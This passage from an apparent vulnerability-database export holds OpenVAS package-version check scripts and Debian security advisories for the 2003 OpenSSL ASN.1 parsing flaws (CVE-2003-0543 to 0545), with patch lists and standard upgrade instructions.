not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_impact = \"Remote Denial of Service (DoS)\";\ntag_affected = \"BIND v920 on\n HP-UX B.11.00, B.11.11, B.11.22, and B.11.23, running BINDv920.\";\ntag_insight = \"1. Certain ASN.1 encodings that are rejected as invalidby the parser can \n trigger a bug in the deallocationof the corresponding data structure, \n corrupting thestack. This can be used as a denial of serviceattack. It is \n currently unknown whether this can beexploited to run malicious code. This \n issue does notaffect OpenSSL 0.9.6.<br2. Unusual ASN.1 tag values can cause \n an out of boundsread under certain circumstances, resulting in adenial of \n service vulnerability.<br3. A malformed public key in a certificate will \n crashthe verify code if it is set to ignore public keydecoding errors. \n Exploitation of an affectedapplication would result in a denial of \n servicevulnerability.<br4. Due to an error in the SSL/TLS protocol \n handling,a server will parse a client certificate when one isnot \n specifically requested.\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://www11.itrc.hp.com/service/cki/docDisplay.do?docId=emr_na-c00901847-1\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.835007\");\n script_version(\"$Revision: 9370 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-04-06 10:53:14 +0200 (Fri, 06 Apr 2018) $\");\n script_tag(name:\"creation_date\", value:\"2009-05-05 12:14:23 +0200 (Tue, 05 May 2009)\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_xref(name: \"HPSBUX\", value: \"00290\");\n script_cve_id(\"CVE-2003-0543\", \"CVE-2003-0544\", \"CVE-2003-0545\");\n script_name( \"HP-UX Update for BIND v920 HPSBUX00290\");\n\n script_tag(name:\"summary\", value:\"Check for the Version of BIND v920\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2009 Greenbone Networks GmbH\");\n script_family(\"HP-UX Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/hp_hp-ux\", \"ssh/login/release\");\n script_tag(name : \"impact\" , value : tag_impact);\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-hpux.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"HPUX11.00\")\n{\n\n if ((res = ishpuxpkgvuln(pkg:\"BINDv920.INETSVCS-BIND\", revision:\"B.11.00.01.003\", rls:\"HPUX11.00\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"HPUX11.22\")\n{\n\n if ((res = ishpuxpkgvuln(pkg:\"InternetSrvcs.INETSVCS2-RUN\", patch_list:['PHNE_29859'], rls:\"HPUX11.22\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"HPUX11.11\")\n{\n\n if ((res = ishpuxpkgvuln(pkg:\"BINDv920.INETSVCS-BIND\", revision:\"B.11.11.01.005\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"HPUX11.23\")\n{\n\n if ((res = ishpuxpkgvuln(pkg:\"InternetSrvcs.INETSVCS2-RUN\", patch_list:['PHNE_31726'], rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-04-09T11:40:46", "bulletinFamily": "scanner", "cvelist": ["CVE-2003-0544", "CVE-2003-0543", "CVE-2003-0545"], "description": "Check for the Version of HP WEBM Services", "modified": "2018-04-06T00:00:00", "published": "2009-05-05T00:00:00", "id": "OPENVAS:1361412562310835108", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310835108", "type": "openvas", "title": "HP-UX Update for HP WEBM Services HPSBUX00288", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# HP-UX Update for HP WEBM Services HPSBUX00288\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2009 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_impact = \"Remote Denial of Service (DoS)\";\ntag_affected = \"HP WEBM Services on\n HP-UX B.11.00 running HP WEBM versions prior to A.01.05.07 HP-UX B.11.11 and \n B.11.23 running HP WEBM versions prior to A.02.00.02\";\ntag_insight = \"Potential security vulnerabilities have been identified with HP-HX running \n HP WEBM Services. The vulnerabilities could be exploited remotely to create \n a Denial of Service (DoS).\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://www11.itrc.hp.com/service/cki/docDisplay.do?docId=emr_na-c00891831-1\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.835108\");\n script_version(\"$Revision: 9370 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-04-06 10:53:14 +0200 (Fri, 06 Apr 2018) $\");\n script_tag(name:\"creation_date\", value:\"2009-05-05 12:14:23 +0200 (Tue, 05 May 2009)\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_xref(name: \"HPSBUX\", value: \"00288\");\n script_cve_id(\"CVE-2003-0543\", \"CVE-2003-0544\", \"CVE-2003-0545\");\n script_name( \"HP-UX Update for HP WEBM Services HPSBUX00288\");\n\n script_tag(name:\"summary\", value:\"Check for the Version of HP WEBM Services\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2009 Greenbone Networks GmbH\");\n script_family(\"HP-UX Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/hp_hp-ux\", \"ssh/login/release\");\n script_tag(name : \"impact\" , value : tag_impact);\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-hpux.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"HPUX11.00\")\n{\n\n if ((res = ishpuxpkgvuln(pkg:\"WBEMServices.WBEM-CORE\", revision:\"A.01.05.07\", rls:\"HPUX11.00\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"HPUX11.23\")\n{\n\n if ((res = ishpuxpkgvuln(pkg:\"WBEMServices.WBEM-CORE\", revision:\"A.02.00.02\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"HPUX11.11\")\n{\n\n if ((res = ishpuxpkgvuln(pkg:\"WBEMServices.WBEM-CORE\", revision:\"A.02.00.02\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-07-24T12:50:15", "bulletinFamily": "scanner", "cvelist": ["CVE-2003-0544", "CVE-2003-0543", "CVE-2003-0545"], "description": "The remote host is missing an update to openssl095\nannounced via advisory DSA 394-1.", "modified": "2017-07-07T00:00:00", "published": "2008-01-17T00:00:00", "id": "OPENVAS:53375", "href": "http://plugins.openvas.org/nasl.php?oid=53375", "type": "openvas", "title": "Debian Security Advisory DSA 394-1 (openssl095)", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_394_1.nasl 6616 2017-07-07 12:10:49Z cfischer $\n# Description: Auto-generated from advisory DSA 394-1\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2007 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largerly excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Steve Henson of the OpenSSL core team identified and prepared fixes\nfor a number of vulnerabilities in the OpenSSL ASN1 code that were\ndiscovered after running a test suite by British National\nInfrastructure Security Coordination Centre (NISCC).\n\nA bug in OpenSSLs SSL/TLS protocol was also identified which causes\nOpenSSL to parse a client certificate from an SSL/TLS client when it\nshould reject it as a protocol error.\n\nThe Common Vulnerabilities and Exposures project identifies the\nfollowing problems:\n\nCVE-2003-0543:\n\nInteger overflow in OpenSSL that allows remote attackers to cause a\ndenial of service (crash) via an SSL client certificate with\ncertain ASN.1 tag values.\n\nCVE-2003-0544:\n\nOpenSSL does not properly track the number of characters in certain\nASN.1 inputs, which allows remote attackers to cause a denial of\nservice (crash) via an SSL client certificate that causes OpenSSL\nto read past the end of a buffer when the long form is used.\n\nCVE-2003-0545:\n\nDouble-free vulnerability allows remote attackers to cause a denial\nof service (crash) and possibly execute arbitrary code via an SSL\nclient certificate with a certain invalid ASN.1 encoding. This bug\nwas only present in OpenSSL 0.9.7 and is listed here only for\nreference.\n\nFor the stable distribution (woody) this problem has been\nfixed in openssl095 version 0.9.5a-6.woody.3.\n\nThis package is not present in the unstable (sid) or testing (sarge)\ndistribution.\n\nWe recommend that you upgrade your libssl095a packages and restart\";\ntag_summary = \"The remote host is missing an update to openssl095\nannounced via advisory DSA 394-1.\";\n\ntag_solution = \"https://secure1.securityspace.com/smysecure/catid.html?in=DSA%20394-1\";\n\nif(description)\n{\n script_id(53375);\n script_version(\"$Revision: 6616 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-07 14:10:49 +0200 (Fri, 07 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2008-01-17 22:36:24 +0100 (Thu, 17 Jan 2008)\");\n script_cve_id(\"CVE-2003-0543\", \"CVE-2003-0544\", \"CVE-2003-0545\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_name(\"Debian Security Advisory DSA 394-1 (openssl095)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2005 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\");\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isdpkgvuln(pkg:\"libssl095a\", ver:\"0.9.5a-6.woody.3\", rls:\"DEB3.0\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-04-09T11:40:57", "bulletinFamily": "scanner", "cvelist": ["CVE-2003-0544", "CVE-2003-0543", "CVE-2003-0545"], "description": "Check for the Version of AAA Server", "modified": "2018-04-06T00:00:00", "published": "2009-05-05T00:00:00", "id": "OPENVAS:1361412562310835123", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310835123", "type": "openvas", "title": "HP-UX Update for AAA Server HPSBUX00286", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# HP-UX Update for AAA Server HPSBUX00286\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2009 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_impact = \"Remote Denial of Service (DoS)\";\ntag_affected = \"AAA Server on\n HP-UX B.11.00 and B.11.11 running HP-UX AAA Server (T1428AA)\";\ntag_insight = \"A potential security vulnerability has been identified with HP-UX AAA \n Server. The vulnerability could be exploitedremotely to create a denial of \n service (DoS).\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://www11.itrc.hp.com/service/cki/docDisplay.do?docId=emr_na-c00912021-1\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.835123\");\n script_version(\"$Revision: 9370 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-04-06 10:53:14 +0200 (Fri, 06 Apr 2018) $\");\n script_tag(name:\"creation_date\", value:\"2009-05-05 12:14:23 +0200 (Tue, 05 May 2009)\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_xref(name: \"HPSBUX\", value: \"00286\");\n script_cve_id(\"CVE-2003-0543\", \"CVE-2003-0544\", \"CVE-2003-0545\");\n script_name( \"HP-UX Update for AAA Server HPSBUX00286\");\n\n script_tag(name:\"summary\", value:\"Check for the Version of AAA Server\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2009 Greenbone Networks GmbH\");\n script_family(\"HP-UX Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/hp_hp-ux\", \"ssh/login/release\");\n script_tag(name : \"impact\" , value : tag_impact);\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-hpux.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"HPUX11.00\")\n{\n\n if ((res = ishpuxpkgvuln(pkg:\"AAAServer\", revision:\"A.06.01.02.04\", rls:\"HPUX11.00\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"HPUX11.11\")\n{\n\n if ((res = ishpuxpkgvuln(pkg:\"AAAServer\", revision:\"A.06.01.02.04\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "debian": [{"lastseen": "2020-11-11T13:12:31", "bulletinFamily": "unix", "cvelist": ["CVE-2003-0544", "CVE-2003-0543"], "description": "- --------------------------------------------------------------------------\nDebian Security Advisory DSA 393-1 security@debian.org\nhttp://www.debian.org/security/ Michael Stone\nOctober 1, 2003 http://www.debian.org/security/faq\n- --------------------------------------------------------------------------\n\nPackage : openssl\nVulnerability : denial of service\nProblem-Type : remote\nDebian-specific: no\nCVE Ids : CAN-2003-0543 CAN-2003-0544\n\nDr. Stephen Henson (steve@openssl.org), using a test suite provided by\nNISCC (www.niscc.gov.uk), discovered a number of errors in the OpenSSL\nASN1 code. Combined with an error that causes the OpenSSL code to parse\nclient certificates even when it should not, these errors can cause a\ndenial of service (DoS) condition on a system using the OpenSSL code, \ndepending on how that code is used. For example, even though apache-ssl\nand ssh link to OpenSSL libraries, they should not be affected by this\nvulnerability. However, other SSL-enabled applications may be\nvulnerable and an OpenSSL upgrade is recommended.\n\nFor the current stable distribution (woody) these problems have been\nfixed in version 0.9.6c-2.woody.4\n\nFor the unstable distribution (sid) these problems have been fixed in\nversion 0.9.7c-1\n\nWe recommend that you update your openssl package. Note that you will\nneed to restart services which use the libssl library for this update\nto take effect.\n\nUpgrade Instructions\n- --------------------\n\nwget url\n will fetch the file for you\ndpkg -i file.deb\n will install the referenced file.\n\nIf you are using the apt-get package manager, use the line for\nsources.list as given below:\n\napt-get update\n will update the internal database\napt-get upgrade\n will install corrected packages\n\nYou may use an automated update by adding the resources from the\nfooter to the proper configuration.\n\nDebian GNU/Linux 3.0 alias woody\n- --------------------------------\n\n Source archives:\n\n http://security.debian.org/pool/updates/main/o/openssl/openssl_0.9.6c-2.woody.4.dsc\n Size/MD5 checksum: 675 76da6f792eccfa0e219a0bb42296546f\n http://security.debian.org/pool/updates/main/o/openssl/openssl_0.9.6c.orig.tar.gz\n Size/MD5 checksum: 2153980 c8261d93317635d56df55650c6aeb3dc\n http://security.debian.org/pool/updates/main/o/openssl/openssl_0.9.6c-2.woody.4.diff.gz\n Size/MD5 checksum: 44514 c07ae1f584c7a8bc4d0a821b8e6801ab\n\n Architecture independent packages:\n\n http://security.debian.org/pool/updates/main/o/openssl/ssleay_0.9.6c-2.woody.4_all.deb\n Size/MD5 checksum: 970 734c96f61a7d7032584ce001811d99ce\n\n Alpha architecture:\n\n http://security.debian.org/pool/updates/main/o/openssl/libssl-dev_0.9.6c-2.woody.4_alpha.deb\n Size/MD5 checksum: 1551438 add644f20298bb07dd2368f6139e03bd\n http://security.debian.org/pool/updates/main/o/openssl/libssl0.9.6_0.9.6c-2.woody.4_alpha.deb\n Size/MD5 checksum: 571194 17117f28911fee940def4cc5a5168ebf\n http://security.debian.org/pool/updates/main/o/openssl/openssl_0.9.6c-2.woody.4_alpha.deb\n Size/MD5 checksum: 736296 f571a65a29ea963e9f82b4a70cc61bbc\n\n ARM architecture:\n\n http://security.debian.org/pool/updates/main/o/openssl/libssl0.9.6_0.9.6c-2.woody.4_arm.deb\n Size/MD5 checksum: 474030 c34ae889a0b0b05d16ab071069886ee8\n http://security.debian.org/pool/updates/main/o/openssl/libssl-dev_0.9.6c-2.woody.4_arm.deb\n Size/MD5 checksum: 1357972 7b5efab549fcace562b1df40f58eb434\n http://security.debian.org/pool/updates/main/o/openssl/openssl_0.9.6c-2.woody.4_arm.deb\n Size/MD5 checksum: 729736 bea9047ba98358b5d843ec5502c08d14\n\n HP Precision architecture:\n\n http://security.debian.org/pool/updates/main/o/openssl/libssl-dev_0.9.6c-2.woody.4_hppa.deb\n Size/MD5 checksum: 1435088 64ec697612a1a8bb7ec02a8dfe0f082a\n http://security.debian.org/pool/updates/main/o/openssl/libssl0.9.6_0.9.6c-2.woody.4_hppa.deb\n Size/MD5 checksum: 564870 7c9f44efb6fbf092a4c6285438f4218f\n http://security.debian.org/pool/updates/main/o/openssl/openssl_0.9.6c-2.woody.4_hppa.deb\n Size/MD5 checksum: 741856 c593ae8279de436da67de14a147b991c\n\n Intel IA-32 architecture:\n\n http://security.debian.org/pool/updates/main/o/openssl/libssl0.9.6_0.9.6c-2.woody.4_i386.deb\n Size/MD5 checksum: 461714 9c291cab723133eb1c7c2309540dd9e2\n http://security.debian.org/pool/updates/main/o/openssl/openssl_0.9.6c-2.woody.4_i386.deb\n Size/MD5 checksum: 721748 654531d126d43611b236964e691b67e2\n http://security.debian.org/pool/updates/main/o/openssl/libssl-dev_0.9.6c-2.woody.4_i386.deb\n Size/MD5 checksum: 1289866 0b05581c2d1c03f72644737aa7c37fe9\n\n Intel IA-64 architecture:\n\n http://security.debian.org/pool/updates/main/o/openssl/openssl_0.9.6c-2.woody.4_ia64.deb\n Size/MD5 checksum: 763482 0292998feaac6ea041d2d044305b7715\n http://security.debian.org/pool/updates/main/o/openssl/libssl0.9.6_0.9.6c-2.woody.4_ia64.deb\n Size/MD5 checksum: 711022 dbfc0819492111ff1b8040c4dc615d03\n http://security.debian.org/pool/updates/main/o/openssl/libssl-dev_0.9.6c-2.woody.4_ia64.deb\n Size/MD5 checksum: 1615238 74a9e23d5f17d9a4f40120d1103bfeb2\n\n Motorola 680x0 architecture:\n\n http://security.debian.org/pool/updates/main/o/openssl/openssl_0.9.6c-2.woody.4_m68k.deb\n Size/MD5 checksum: 720358 293043604c8e259a058f5e1d5925a96e\n http://security.debian.org/pool/updates/main/o/openssl/libssl0.9.6_0.9.6c-2.woody.4_m68k.deb\n Size/MD5 checksum: 450572 5ebfb9bc4f0da2986373032213e22f3d\n http://security.debian.org/pool/updates/main/o/openssl/libssl-dev_0.9.6c-2.woody.4_m68k.deb\n Size/MD5 checksum: 1266566 5d8c56beaaa413dd72d3cf90b5b30349\n\n Big endian MIPS architecture:\n\n http://security.debian.org/pool/updates/main/o/openssl/openssl_0.9.6c-2.woody.4_mips.deb\n Size/MD5 checksum: 717764 d7019cf6cf0d6618f8789c8290697367\n http://security.debian.org/pool/updates/main/o/openssl/libssl-dev_0.9.6c-2.woody.4_mips.deb\n Size/MD5 checksum: 1416184 09aa020367ef0d06e3e22e550ea12102\n http://security.debian.org/pool/updates/main/o/openssl/libssl0.9.6_0.9.6c-2.woody.4_mips.deb\n Size/MD5 checksum: 483650 3008bbee5c4f7f5faf344317c59e0d82\n\n Little endian MIPS architecture:\n\n http://security.debian.org/pool/updates/main/o/openssl/openssl_0.9.6c-2.woody.4_mipsel.deb\n Size/MD5 checksum: 717060 3180c04a1cb7dd325b06496ca2bff71b\n http://security.debian.org/pool/updates/main/o/openssl/libssl-dev_0.9.6c-2.woody.4_mipsel.deb\n Size/MD5 checksum: 1410226 35cc9bc327c59471f5a909878efdbb76\n http://security.debian.org/pool/updates/main/o/openssl/libssl0.9.6_0.9.6c-2.woody.4_mipsel.deb\n Size/MD5 checksum: 476638 bb83a9bfc07679fbe21aab5abd56256f\n\n PowerPC architecture:\n\n http://security.debian.org/pool/updates/main/o/openssl/libssl-dev_0.9.6c-2.woody.4_powerpc.deb\n Size/MD5 checksum: 1386776 f379528eae7a157bd830ea43a371efe4\n http://security.debian.org/pool/updates/main/o/openssl/openssl_0.9.6c-2.woody.4_powerpc.deb\n Size/MD5 checksum: 726638 45d8adac74a907263e7507f64fd3c3e3\n http://security.debian.org/pool/updates/main/o/openssl/libssl0.9.6_0.9.6c-2.woody.4_powerpc.deb\n Size/MD5 checksum: 502422 a386a0fdd637da29848219a1ca16eae1\n\n IBM S/390 architecture:\n\n http://security.debian.org/pool/updates/main/o/openssl/libssl0.9.6_0.9.6c-2.woody.4_s390.deb\n Size/MD5 checksum: 510438 4044c7c34e45d3b9b7f3ef69eacae491\n http://security.debian.org/pool/updates/main/o/openssl/openssl_0.9.6c-2.woody.4_s390.deb\n Size/MD5 checksum: 731592 79fe91bb12f87b2dc05a4dff2aba1a10\n http://security.debian.org/pool/updates/main/o/openssl/libssl-dev_0.9.6c-2.woody.4_s390.deb\n Size/MD5 checksum: 1326384 0352ce5cd87305074b2fdc91e78badca\n\n Sun Sparc architecture:\n\n http://security.debian.org/pool/updates/main/o/openssl/libssl0.9.6_0.9.6c-2.woody.4_sparc.deb\n Size/MD5 checksum: 484720 99bace5e1758b19404ef0ab618f37048\n http://security.debian.org/pool/updates/main/o/openssl/libssl-dev_0.9.6c-2.woody.4_sparc.deb\n Size/MD5 checksum: 1344194 2290093fa5e49278491fdbe03f14ab1a\n http://security.debian.org/pool/updates/main/o/openssl/openssl_0.9.6c-2.woody.4_sparc.deb\n Size/MD5 checksum: 737150 28a4ebcf466e4c4d8aaa0afe974e9893\n\n These files will probably be moved into the stable distribution on\n its next revision.\n\n- ---------------------------------------------------------------------------------\nFor apt-get: deb http://security.debian.org/ stable/updates main\nFor dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main\nMailing list: debian-security-announce@lists.debian.org\nPackage info: `apt-cache show &lt;pkg&gt;&#x27; and http://packages.debian.org/&lt;pkg&gt;\n\n", "edition": 3, "modified": "2003-10-01T00:00:00", "published": "2003-10-01T00:00:00", "id": "DEBIAN:DSA-393-1:6D39D", "href": "https://lists.debian.org/debian-security-announce/debian-security-announce-2003/msg00201.html", "title": "[SECURITY] [DSA-393-1] New OpenSSL packages correct denial of service issues", "type": "debian", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2019-05-30T02:21:48", "bulletinFamily": "unix", "cvelist": ["CVE-2003-0544", "CVE-2003-0543", "CVE-2003-0545"], "description": "- --------------------------------------------------------------------------\nDebian Security Advisory DSA 394-1 security@debian.org\nhttp://www.debian.org/security/ Martin Schulze\nOctober 11th, 2003 http://www.debian.org/security/faq\n- --------------------------------------------------------------------------\n\nPackage : openssl095\nVulnerability : ASN.1 parsing vulnerability\nProblem-Type : remote\nDebian-specific: no\nCVE references : CAN-2003-0543 CAN-2003-0544 CAN-2003-0545\n\nSteve Henson of the OpenSSL core team identified and prepared fixes\nfor a number of vulnerabilities in the OpenSSL ASN1 code that were\ndiscovered after running a test suite by British National\nInfrastructure Security Coordination Centre (NISCC).\n\nA bug in OpenSSLs SSL/TLS protocol was also identified which causes\nOpenSSL to parse a client certificate from an SSL/TLS client when it\nshould reject it as a protocol error.\n\nThe Common Vulnerabilities and Exposures project identifies the\nfollowing problems:\n\nCAN-2003-0543:\n\n Integer overflow in OpenSSL that allows remote attackers to cause a\n denial of service (crash) via an SSL client certificate with\n certain ASN.1 tag values.\n\nCAN-2003-0544:\n\n OpenSSL does not properly track the number of characters in certain\n ASN.1 inputs, which allows remote attackers to cause a denial of\n service (crash) via an SSL client certificate that causes OpenSSL\n to read past the end of a buffer when the long form is used.\n\nCAN-2003-0545:\n\n Double-free vulnerability allows remote attackers to cause a denial\n of service (crash) and possibly execute arbitrary code via an SSL\n client certificate with a certain invalid ASN.1 encoding. This bug\n was only present in OpenSSL 0.9.7 and is listed here only for\n reference.\n\nFor the stable distribution (woody) this problem has been\nfixed in openssl095 version 0.9.5a-6.woody.3.\n\nThis package is not present in the unstable (sid) or testing (sarge)\ndistribution.\n\nWe recommend that you upgrade your libssl095a packages and restart\nservices using this library. Debian doesn&#x27;t ship any packages that\nare linked against this library.\n\nThe following commandline (courtesy of Ray Dassen) produces a list of\nnames of running processes that have libssl095 mapped into their\nmemory space:\n\n find /proc -name maps -exec egrep -l &#x27;libssl095&#x27; {} /dev/null \\; \\\n | sed -e &#x27;s/[^0-9]//g&#x27; | xargs --no-run-if-empty ps --no-headers -p | \\\n sed -e &#x27;s/^\\+//&#x27; -e &#x27;s/ \\+/ /g&#x27; | cut -d &#x27; &#x27; -f 5 | sort | uniq\n\nYou should restart the associated services.\n\n\nUpgrade Instructions\n- --------------------\n\nwget url\n will fetch the file for you\ndpkg -i file.deb\n will install the referenced file.\n\nIf you are using the apt-get package manager, use the line for\nsources.list as given below:\n\napt-get update\n will update the internal database\napt-get upgrade\n will install corrected packages\n\nYou may use an automated update by adding the resources from the\nfooter to the proper configuration.\n\n\nDebian GNU/Linux 3.0 alias woody\n- --------------------------------\n\n Source archives:\n\n http://security.debian.org/pool/updates/main/o/openssl095/openssl095_0.9.5a-6.woody.3.dsc\n Size/MD5 checksum: 631 ba6e597ab2db2984aef6c2a765ac29c0\n http://security.debian.org/pool/updates/main/o/openssl095/openssl095_0.9.5a-6.woody.3.diff.gz\n Size/MD5 checksum: 38851 6b197111a7068a7ea29ef55176771d89\n http://security.debian.org/pool/updates/main/o/openssl095/openssl095_0.9.5a.orig.tar.gz\n Size/MD5 checksum: 1892089 